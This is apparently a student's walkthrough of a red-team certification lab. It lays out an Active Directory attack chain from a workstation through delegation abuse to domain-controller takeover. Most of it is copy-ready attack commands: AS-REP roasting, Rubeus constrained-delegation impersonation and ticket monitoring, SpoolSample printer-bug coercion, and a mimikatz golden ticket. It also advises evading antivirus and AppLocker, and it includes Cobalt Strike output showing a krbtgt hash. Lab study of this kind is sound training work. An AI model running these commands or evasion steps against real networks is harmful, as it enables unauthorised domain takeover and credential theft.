
Old Crto 2


RDP into the given machine.

Attack path:

The first machine will be wkstn-3.

Wkstn-3 (always elevated) -> srv-1 (constrained delegation) -> srv-2 (unconstrained delegation, printer bug) -> dc-2 -> cross trust -> dc-1 -> sql


Install PowerShell 6 if you need to bypass Constrained Language Mode.


You need to bypass AV at wkstn-3 and during the enumeration (your beacon needs to be undetected if using CS, i.e. Cobalt Strike).
If using Covenant: https://luemmelsec.github.io/Circumventing-Countermeasures-In-AD/

Open your beacon to get a shell back. To get SYSTEM you need to follow the course material: always install elevated, rename it to lapsx64.msi as per the AppLocker policy, and place it in the task.

Run BloodHound.
AS-REP roast jjames and atorres and crack them.

PsExec into srv-1.


On srv-1

Impersonate ofisher with constrained delegation:

shell c:\temp\rubeus.exe s4u /domain:child.redteamops.local /ticket:<base64 ticket blob, omitted> /impersonateuser:Administrator /msdsspn:time/srv-2.child.redteamops.local /altservice:cifs,host /ptt

Do unconstrained delegation on srv-2 to reach dc-2.
.\Rubeus.exe monitor /interval:1 (run this on the computer with unconstrained delegation)
Then on another window: .\SpoolSample.exe targetMachine.dc.local currentMachine.local

So get 2 shells: first start the Rubeus monitor, then use SpoolSample.exe to trigger the printer bug.

So for you it will be: .\SpoolSample.exe dc-2.child.redteamops.local srv-2.child.redteamops.local

For me, I just ran monitor and got the TGT.
Rubeus.exe ptt /ticket:<<paste the above ticket here>>

Jump to dc-2


Forge a golden ticket with the krbtgt hash dumped from dc-2:

mimikatz kerberos::golden /domain:child.redteamops.local /sid:S-1-5-21-2453654091-64307236-1669735849 /krbtgt:6ad171448618690dde2c67f72b85a5ea /sids:S-1-5-21-2453654091-64307236-1669735849-519 /user:administrator /ptt

[*] Tasked beacon to run mimikatz's kerberos::golden /domain:child.redteamops.local /sid:S-1-5-21-2453654091-64307236-1669735849 /krbtgt:6ad171448618690dde2c67f72b85a5ea /sids:S-1-5-21-2453654091-64307236-1669735849-519 /user:administrator /ptt command
[+] host called home, sent: 706122 bytes
[+] received output:

User : administrator
Domain : child.redteamops.local (CHILD)
SID : S-1-5-21-2453654091-64307236-1669735849
User Id : 500

Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2453654091-64307236-1669735849-519 ;
ServiceKey: 6ad171448618690dde2c67f72b85a5ea - rc4_hmac_nt
Lifetime :

-> Ticket : ** Pass The Ticket **


* PAC generated
* PAC signed

* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'administrator @ child.redteamops.local' successfully submitted for current session